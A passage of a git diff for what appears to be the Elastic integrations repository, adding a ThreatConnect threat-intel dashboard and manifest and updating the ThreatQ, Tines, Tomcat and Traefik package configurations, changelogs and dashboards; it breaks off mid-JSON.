"e0f08aa6-381d-43dc-87f4-7aed2b711531", + "w": 24, + "x": 0, + "y": 57 + }, + "panelIndex": "e0f08aa6-381d-43dc-87f4-7aed2b711531", + "title": "Top 10 Host Details [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-81d7992b-9bf9-49b8-be57-190a1295b2c9", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "81d7992b-9bf9-49b8-be57-190a1295b2c9": { + "columnOrder": [ + "24ae2748-3a92-4338-b07c-97edf6846f26", + "b9865834-c554-4fd3-aeba-417c3f4e66c7" + ], + "columns": { + "24ae2748-3a92-4338-b07c-97edf6846f26": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Type", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "b9865834-c554-4fd3-aeba-417c3f4e66c7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat_connect.indicator.attributes.data.type" + }, + "b9865834-c554-4fd3-aeba-417c3f4e66c7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "threat_connect.indicator.attributes.data.id" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "b9865834-c554-4fd3-aeba-417c3f4e66c7" + ], + "layerId": "81d7992b-9bf9-49b8-be57-190a1295b2c9", + "layerType": "data", + "seriesType": "bar", + "xAccessor": "24ae2748-3a92-4338-b07c-97edf6846f26" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false + }, + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "show" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "a3ae99d6-39e1-4b21-9ba4-5dc08bfdc2cc", + "w": 24, + "x": 24, + "y": 57 + }, + "panelIndex": "a3ae99d6-39e1-4b21-9ba4-5dc08bfdc2cc", + "title": "Indicator Attributes by Type [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-d69a36b3-ced4-4265-90c0-89a707c1004e", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "d69a36b3-ced4-4265-90c0-89a707c1004e": { + "columnOrder": [ + "c2549442-c685-4722-867a-f5ba2053db92", + "d4d22514-6ee4-4752-a6da-835ea9121f00" + ], + "columns": { + "c2549442-c685-4722-867a-f5ba2053db92": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "d4d22514-6ee4-4752-a6da-835ea9121f00": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "d4d22514-6ee4-4752-a6da-835ea9121f00" + ], + "layerId": "d69a36b3-ced4-4265-90c0-89a707c1004e", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "c2549442-c685-4722-867a-f5ba2053db92" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "bf742114-3ce0-498e-8855-5b7759095d38", + "w": 24, + "x": 0, + "y": 72 + }, + "panelIndex": "bf742114-3ce0-498e-8855-5b7759095d38", + "title": " Indicator Over Time [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-80cbd0fd-3ebe-4209-bd05-7bf30720ceea", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "80cbd0fd-3ebe-4209-bd05-7bf30720ceea": { + "columnOrder": [ + "fbe0e23b-d178-4dcd-a357-a6c58b5bb857", + "1f57c455-830f-41f5-8e26-af95378033a8" + ], + "columns": { + "1f57c455-830f-41f5-8e26-af95378033a8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "fbe0e23b-d178-4dcd-a357-a6c58b5bb857": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "URL", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1f57c455-830f-41f5-8e26-af95378033a8", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat.indicator.url.original" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "fbe0e23b-d178-4dcd-a357-a6c58b5bb857" + }, + { + "columnId": "1f57c455-830f-41f5-8e26-af95378033a8", + "isTransposed": false + } + ], + "layerId": "80cbd0fd-3ebe-4209-bd05-7bf30720ceea", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "0d812096-c012-4399-a9bb-3ad7b43a3c30", + "w": 24, + "x": 24, + "y": 72 + }, + "panelIndex": "0d812096-c012-4399-a9bb-3ad7b43a3c30", + "title": "Top 10 Accessed URLs [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f2061406-e25c-4076-b762-bb84c804c536", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f2061406-e25c-4076-b762-bb84c804c536": { + "columnOrder": [ + "111ef2da-8ce5-4c14-9efb-4014c12900f6", + "f381bc58-ce2a-41ed-a700-2c817bce9c40" + ], + "columns": { + "111ef2da-8ce5-4c14-9efb-4014c12900f6": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Owner Name", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "f381bc58-ce2a-41ed-a700-2c817bce9c40", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat_connect.indicator.owner.name" + }, + "f381bc58-ce2a-41ed-a700-2c817bce9c40": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "111ef2da-8ce5-4c14-9efb-4014c12900f6", + "isTransposed": false + }, + { + "columnId": "f381bc58-ce2a-41ed-a700-2c817bce9c40", + "isTransposed": false + } + ], + "layerId": "f2061406-e25c-4076-b762-bb84c804c536", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "e7f72491-f16b-413b-989e-8a0160c267a0", + "w": 24, + "x": 24, + "y": 87 + }, + "panelIndex": "e7f72491-f16b-413b-989e-8a0160c267a0", + "title": "Top 10 Owner Associated with Indicator [Logs ThreatConnect]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-e5a82fdf-33c0-4d88-83d7-4367b95c1e08", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "e5a82fdf-33c0-4d88-83d7-4367b95c1e08": { + "columnOrder": [ + "acd59967-a926-452d-b83a-4bf6085a41d1", + "14e5af4d-d4f0-4522-b162-bb4e9f3770d7" + ], + "columns": { + "14e5af4d-d4f0-4522-b162-bb4e9f3770d7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "acd59967-a926-452d-b83a-4bf6085a41d1": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Associated Group Names", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "14e5af4d-d4f0-4522-b162-bb4e9f3770d7", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "threat_connect.indicator.associated_groups.data.name" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "acd59967-a926-452d-b83a-4bf6085a41d1", + "isTransposed": false + }, + { + "columnId": "14e5af4d-d4f0-4522-b162-bb4e9f3770d7", + "isTransposed": false + } + ], + "layerId": "e5a82fdf-33c0-4d88-83d7-4367b95c1e08", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "b93c2896-87e5-4cfe-8954-0bae5a0815be", + "w": 24, + "x": 0, + "y": 87 + }, + "panelIndex": "b93c2896-87e5-4cfe-8954-0bae5a0815be", + "title": "Top 10 Associated Groups [Logs ThreatConnect]", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Logs ThreatConnect] Indicator", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-01-12T06:46:34.698Z", + "id": "ti_threatconnect-2d465f90-973d-11ee-839e-ef65b7014120", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3ddaf7b4-453d-488c-a2ed-76a6cd318230:indexpattern-datasource-layer-89f5dc3a-f57a-474d-be03-49659399fcbe", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fcb4c79b-ae94-4f79-a280-319fe1ee0a77:indexpattern-datasource-layer-c3124540-fb37-497c-8e54-fe6206e27a29", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "da4952b2-7a0a-47e6-8307-91fbeff1cd49:indexpattern-datasource-layer-421cfbca-ee3a-4ebb-9ac8-9bbdcd4eae81", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "561f36d9-8bd8-4438-8670-292221db6ec3:indexpattern-datasource-layer-216e8a8a-32b9-4fa8-857c-340f946e3d84", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "1cdedc22-76b1-44fa-9cf5-296d8ff7c09b:indexpattern-datasource-layer-961eaa59-f6c0-488d-a59d-4212ada370ae", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "aa6453b1-0bb5-4f14-b7e1-4f4ac6196676:indexpattern-datasource-layer-f6579f3d-a2c5-4667-a2ba-7ed6f0397e2a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "dc75f1d2-0674-4521-a88d-38f0c66ff7c9:indexpattern-datasource-layer-dcd07ab5-5229-4f16-bee4-af9aff1817a9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "cd65eda6-09a2-4264-9288-0845dd8db3cf:indexpattern-datasource-layer-f601aefb-f565-4983-beff-a2cafafff86d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e0f08aa6-381d-43dc-87f4-7aed2b711531:indexpattern-datasource-layer-b9ea7b8e-ee36-4720-b936-c34cead4e4ed", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "a3ae99d6-39e1-4b21-9ba4-5dc08bfdc2cc:indexpattern-datasource-layer-81d7992b-9bf9-49b8-be57-190a1295b2c9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "bf742114-3ce0-498e-8855-5b7759095d38:indexpattern-datasource-layer-d69a36b3-ced4-4265-90c0-89a707c1004e", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0d812096-c012-4399-a9bb-3ad7b43a3c30:indexpattern-datasource-layer-80cbd0fd-3ebe-4209-bd05-7bf30720ceea", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "e7f72491-f16b-413b-989e-8a0160c267a0:indexpattern-datasource-layer-f2061406-e25c-4076-b762-bb84c804c536", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b93c2896-87e5-4cfe-8954-0bae5a0815be:indexpattern-datasource-layer-e5a82fdf-33c0-4d88-83d7-4367b95c1e08", + "type": "index-pattern" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/ti_threatconnect/manifest.yml b/packages/ti_threatconnect/manifest.yml new file mode 100644 index 00000000000..35e4d9d80fe --- /dev/null +++ b/packages/ti_threatconnect/manifest.yml @@ -0,0 +1,94 @@ +format_version: 3.0.3 +name: ti_threatconnect +title: ThreatConnect +version: 0.3.0 +description: Collect logs from ThreatConnect with Elastic Agent. +type: integration +categories: + - security + - threat_intel +conditions: + kibana: + version: ^8.12.0 + elastic: + subscription: basic +screenshots: + - src: /img/threat-connect-indicator-dashboard.png + title: Sample screenshot + size: 600x600 + type: image/png +icons: + - src: /img/threat-connect-logo.svg + title: Sample logo + size: 32x32 + type: image/svg+xml +policy_templates: + - name: threatconnect + title: ThreatConnect logs + description: Collect ThreatConnect logs. + inputs: + - type: cel + title: Collect ThreatConnect logs via API + description: Collecting ThreatConnect logs via API. + vars: + - name: url + type: text + title: URL + description: "Base URL of the ThreatConnect API. Default URL given is for the ThreatConnect's Public Cloud instance. Note: Do not include trailing slash “/” character." + default: https://app.threatconnect.com + required: true + show_user: true + - name: access_id + type: text + title: Access ID + description: Access ID of a ThreatConnect API User. + multi: false + required: true + show_user: true + - name: secret_key + type: password + title: Secret Key + description: Secret Key of a ThreatConnect API User. + multi: false + required: true + show_user: true + secret: true + - name: proxy_url + type: text + title: Proxy URL + multi: false + required: false + show_user: false + description: URL to proxy connections in the form of http[s]://:@:. Please ensure your username and password are in URL encoded format. + - name: ssl + type: yaml + title: SSL Configuration + description: i.e. certificate_authorities, supported_protocols, verification_mode etc. + multi: false + required: false + show_user: false + default: | + #certificate_authorities: + # - | + # -----BEGIN CERTIFICATE----- + # MIIDCjCCAfKgAwIBAgITJ706Mu2wJlKckpIvkWxEHvEyijANBgkqhkiG9w0BAQsF + # ADAUMRIwEAYDVQQDDAlsb2NhbGhvc3QwIBcNMTkwNzIyMTkyOTA0WhgPMjExOTA2 + # MjgxOTI5MDRaMBQxEjAQBgNVBAMMCWxvY2FsaG9zdDCCASIwDQYJKoZIhvcNAQEB + # BQADggEPADCCAQoCggEBANce58Y/JykI58iyOXpxGfw0/gMvF0hUQAcUrSMxEO6n + # fZRA49b4OV4SwWmA3395uL2eB2NB8y8qdQ9muXUdPBWE4l9rMZ6gmfu90N5B5uEl + # 94NcfBfYOKi1fJQ9i7WKhTjlRkMCgBkWPkUokvBZFRt8RtF7zI77BSEorHGQCk9t + # /D7BS0GJyfVEhftbWcFEAG3VRcoMhF7kUzYwp+qESoriFRYLeDWv68ZOvG7eoWnP + # PsvZStEVEimjvK5NSESEQa9xWyJOmlOKXhkdymtcUd/nXnx6UTCFgnkgzSdTWV41 + # CI6B6aJ9svCTI2QuoIq2HxX/ix7OvW1huVmcyHVxyUECAwEAAaNTMFEwHQYDVR0O + # BBYEFPwN1OceFGm9v6ux8G+DZ3TUDYxqMB8GA1UdIwQYMBaAFPwN1OceFGm9v6ux + # 8G+DZ3TUDYxqMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAG5D + # 874A4YI7YUwOVsVAdbWtgp1d0zKcPRR+r2OdSbTAV5/gcS3jgBJ3i1BN34JuDVFw + # 3DeJSYT3nxy2Y56lLnxDeF8CUTUtVQx3CuGkRg1ouGAHpO/6OqOhwLLorEmxi7tA + # H2O8mtT0poX5AnOAhzVy7QW0D/k4WaoLyckM5hUa6RtvgvLxOwA0U+VGurCDoctu + # 8F4QOgTAWyh8EZIwaKCliFRSynDpv3JTUwtfZkxo6K6nce1RhCWFAsMvDZL8Dgc0 + # yvgJ38BRsFOtkRuAGSf6ZUwTO8JJRRIFnpUzXflAnGivK9M13D5GEQMmIl6U9Pvk + # sxSmbIUfc2SGJGCJD4I= + # -----END CERTIFICATE----- +owner: + github: elastic/security-service-integrations + type: elastic diff --git a/packages/ti_threatconnect/validation.yml b/packages/ti_threatconnect/validation.yml new file mode 100644 index 00000000000..fe6ea6d0d99 --- /dev/null +++ b/packages/ti_threatconnect/validation.yml @@ -0,0 +1,3 @@ +errors: + exclude_checks: + - SVR00002 # Saved query, but no filter. diff --git a/packages/ti_threatq/changelog.yml b/packages/ti_threatq/changelog.yml index 6f6f57ab2cf..1237f980a8c 100644 --- a/packages/ti_threatq/changelog.yml +++ b/packages/ti_threatq/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.25.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.24.2" changes: - description: Changed owners diff --git a/packages/ti_threatq/data_stream/threat/manifest.yml b/packages/ti_threatq/data_stream/threat/manifest.yml index 42aa9b4e0a8..91d7146315d 100644 --- a/packages/ti_threatq/data_stream/threat/manifest.yml +++ b/packages/ti_threatq/data_stream/threat/manifest.yml @@ -32,6 +32,7 @@ streams: required: true show_user: true description: The Client ID used to access the ThreatQ instance. + secret: true - name: token_url type: text title: ThreatQ Oauth2 Token URL @@ -40,6 +41,7 @@ streams: show_user: true description: The Token URL used for Oauth2 Authentication. default: https://threatqexample.com/api/token + secret: false - name: data_collection_id type: text title: ThreatQ Collection ID diff --git a/packages/ti_threatq/manifest.yml b/packages/ti_threatq/manifest.yml index d21346977d6..9752d3c3fca 100644 --- a/packages/ti_threatq/manifest.yml +++ b/packages/ti_threatq/manifest.yml @@ -1,13 +1,13 @@ name: ti_threatq title: ThreatQuotient -version: "1.24.2" +version: "1.25.0" description: Ingest threat intelligence indicators from ThreatQuotient with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: ["security", "threat_intel"] conditions: kibana: - version: ^8.11.0 + version: ^8.12.0 icons: - src: /img/threatq.svg title: ThreatQuotient diff --git a/packages/ti_util/changelog.yml b/packages/ti_util/changelog.yml index bd9fe401abb..57eee3b7de4 100644 --- a/packages/ti_util/changelog.yml +++ b/packages/ti_util/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.5.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9404 - version: "1.4.1" changes: - description: Changed owners diff --git a/packages/ti_util/manifest.yml b/packages/ti_util/manifest.yml index 28646172e7f..b6c9189f2d9 100644 --- a/packages/ti_util/manifest.yml +++ b/packages/ti_util/manifest.yml @@ -1,6 +1,6 @@ name: ti_util title: "Threat Intelligence Utilities" -version: "1.4.1" +version: "1.5.0" description: Prebuilt Threat Intelligence dashboard for Elastic Security categories: - security @@ -8,7 +8,7 @@ categories: conditions: kibana: version: ^8.5.0 -format_version: "3.0.0" +format_version: "3.0.3" type: integration screenshots: - src: /img/threat-intel-overview.png diff --git a/packages/tines/changelog.yml b/packages/tines/changelog.yml index f5a8e092b30..65628977b24 100644 --- a/packages/tines/changelog.yml +++ b/packages/tines/changelog.yml @@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.11.0" + changes: + - description: Update manifest format version to v3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9404 +- version: "1.10.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9129 - version: "1.9.1" changes: - description: Changed owners diff --git a/packages/tines/data_stream/audit_logs/_dev/test/system/test-default-config.yml b/packages/tines/data_stream/audit_logs/_dev/test/system/test-default-config.yml index b143494b77c..0883271b0f5 100644 --- a/packages/tines/data_stream/audit_logs/_dev/test/system/test-default-config.yml +++ b/packages/tines/data_stream/audit_logs/_dev/test/system/test-default-config.yml @@ -9,3 +9,5 @@ data_stream: vars: preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 20 diff --git a/packages/tines/data_stream/audit_logs/fields/fields.yml b/packages/tines/data_stream/audit_logs/fields/fields.yml index 11a49b0ffbe..d4be3b75721 100644 --- a/packages/tines/data_stream/audit_logs/fields/fields.yml +++ b/packages/tines/data_stream/audit_logs/fields/fields.yml @@ -45,6 +45,18 @@ type: long - name: actions type: group + fields: + - name: actionId + type: long + - name: options + type: keyword + - name: schedule + type: group + fields: + - name: cron + type: keyword + - name: timezone + type: keyword - name: agents type: flattened - name: allowedHosts diff --git a/packages/tines/data_stream/time_saved/_dev/test/system/test-default-config.yml b/packages/tines/data_stream/time_saved/_dev/test/system/test-default-config.yml index b143494b77c..b81559e4bce 100644 --- a/packages/tines/data_stream/time_saved/_dev/test/system/test-default-config.yml +++ b/packages/tines/data_stream/time_saved/_dev/test/system/test-default-config.yml @@ -9,3 +9,5 @@ data_stream: vars: preserve_original_event: true preserve_duplicate_custom_fields: true +assert: + hit_count: 241 diff --git a/packages/tines/docs/README.md b/packages/tines/docs/README.md index 3c68008314b..7a0c08aca50 100644 --- a/packages/tines/docs/README.md +++ b/packages/tines/docs/README.md @@ -111,6 +111,10 @@ All fields ingested to this data stream are stored under `tines.audit_log` as ea | tines.audit_log.inputs.diagramNoteIds | | long | | tines.audit_log.inputs.inputs.actionId | | long | | tines.audit_log.inputs.inputs.actionIds | | long | +| tines.audit_log.inputs.inputs.actions.actionId | | long | +| tines.audit_log.inputs.inputs.actions.options | | keyword | +| tines.audit_log.inputs.inputs.actions.schedule.cron | | keyword | +| tines.audit_log.inputs.inputs.actions.schedule.timezone | | keyword | | tines.audit_log.inputs.inputs.agents | | flattened | | tines.audit_log.inputs.inputs.allowedHosts | | keyword | | tines.audit_log.inputs.inputs.authenticationTokenId | | long | diff --git a/packages/tines/manifest.yml b/packages/tines/manifest.yml index e675cb8e6cb..f16eef73735 100644 --- a/packages/tines/manifest.yml +++ b/packages/tines/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: tines title: "Tines" -version: "1.9.1" +version: "1.11.0" description: "Tines Logs & Time Saved Reports" type: integration categories: @@ -9,7 +9,7 @@ categories: - security conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" elastic: subscription: "basic" screenshots: @@ -55,10 +55,11 @@ policy_templates: show_user: true required: false - name: auth_token - type: text + type: password title: Tines API User Account API Key show_user: true required: true + secret: true owner: github: elastic/security-service-integrations type: community diff --git a/packages/tomcat/_dev/deploy/docker/docker-compose.yml b/packages/tomcat/_dev/deploy/docker/docker-compose.yml index 1c14d8ec30a..9cbae78a295 100644 --- a/packages/tomcat/_dev/deploy/docker/docker-compose.yml +++ b/packages/tomcat/_dev/deploy/docker/docker-compose.yml @@ -7,14 +7,12 @@ services: - ${SERVICE_LOGS_DIR}:/var/log command: /bin/sh -c "cp /sample_logs/* /var/log/" tomcat-log-udp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=udp /sample_logs/tomcat-log-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=udp /sample_logs/tomcat-log-*.log tomcat-log-tcp: - image: akroh/stream:v0.2.0 + image: docker.elastic.co/observability/stream:v0.15.0 volumes: - ./sample_logs:/sample_logs:ro - entrypoint: /bin/bash - command: -c "/stream log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=tcp /sample_logs/tomcat-log-*.log" + command: log --start-signal=SIGHUP --delay=5s --addr elastic-agent:9523 -p=tcp /sample_logs/tomcat-log-*.log diff --git a/packages/traefik/changelog.yml b/packages/traefik/changelog.yml index fadc615fb77..0271f2ee970 100644 --- a/packages/traefik/changelog.yml +++ b/packages/traefik/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.11.1" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/8423 - version: 1.11.0 changes: - description: Update the package format_version to 3.0.0. diff --git a/packages/traefik/kibana/dashboard/traefik-Logs-Traefik-Dashboard.json b/packages/traefik/kibana/dashboard/traefik-Logs-Traefik-Dashboard.json index 65f45fefca8..ed26c613540 100644 --- a/packages/traefik/kibana/dashboard/traefik-Logs-Traefik-Dashboard.json +++ b/packages/traefik/kibana/dashboard/traefik-Logs-Traefik-Dashboard.json @@ -1,789 +1,821 @@ { - "attributes": { - "description": "Dashboard for the Logs Traefik integration", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } + "id": "traefik-Logs-Traefik-Dashboard", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:29:45.074Z", + "created_at": "2023-11-07T17:29:45.074Z", + "version": "WzE2OCwxXQ==", + "attributes": { + "description": "Dashboard for the Logs Traefik integration", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "darkTheme": false + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hiddenLayers": [], + "isLayerTOCOpen": true, + "mapBuffer": { + "maxLat": 40.9799, + "maxLon": 135, + "minLat": -40.9799, + "minLon": -135 + }, + "mapCenter": { + "lat": 19.94277, + "lon": 0, + "zoom": 2.11 + }, + "openTOCDetails": [], + "attributes": { + "title": "Traefik logs [Logs Traefik]", + "description": "", + "uiStateJSON": "{\"isLayerTOCOpen\":true,\"openTOCDetails\":[]}", + "mapStateJSON": "{\"center\":{\"lat\":19.94277,\"lon\":0},\"filters\":[],\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"refreshConfig\":{\"interval\":0,\"isPaused\":true},\"settings\":{\"autoFitToDataBounds\":false,\"backgroundColor\":\"#ffffff\",\"browserLocation\":{\"zoom\":2},\"disableInteractive\":false,\"disableTooltipControl\":false,\"fixedLocation\":{\"lat\":0,\"lon\":0,\"zoom\":2},\"hideLayerControl\":false,\"hideToolbarOverlay\":false,\"hideViewControl\":false,\"initialLocation\":\"LAST_SAVED_LOCATION\",\"maxZoom\":24,\"minZoom\":0,\"showScaleControl\":false,\"showSpatialFilters\":true,\"showTimesliderToggleButton\":true,\"spatialFiltersAlpa\":0.3,\"spatialFiltersFillColor\":\"#DA8B45\",\"spatialFiltersLineColor\":\"#DA8B45\"},\"timeFilters\":{\"from\":\"now-15m\",\"to\":\"now\"},\"zoom\":2.11}", + "layerListJSON": 